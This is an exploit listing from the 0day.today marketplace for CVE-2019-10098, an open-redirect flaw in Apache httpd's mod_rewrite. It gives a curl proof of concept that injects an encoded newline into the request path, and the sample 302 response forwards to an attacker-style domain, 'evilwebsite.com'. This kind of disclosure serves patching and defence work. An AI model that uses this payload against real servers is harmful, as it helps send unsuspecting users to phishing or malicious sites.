[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Apache Httpd mod_rewrite - Open Redirects Vulnerability

Author
Sebastian Neef
Risk
[
Security Risk Low
]
0day-ID
0day-ID-33577
Category
web applications
Date add
19-11-2019
CVE
CVE-2019-10098
Platform
multiple
Normal URLs like http://redirect.local/test will be forwared to https://redirect.local/test. But by using newlines (CVE 2019-10098), we can redirect somewhere else (i.e. to `https://redirect.local.evilwebsite.com`):

```
curl -Ik 'https://redirect.local/%0a.evilwebsite.com' --path-as-is
HTTP/2 302 
date: Mon, 28 Oct 2019 03:36:58 GMT
content-type: text/html; charset=iso-8859-1
location: https://redirect.local.evilwebsite.com
```

#  0day.today [2024-07-05]  #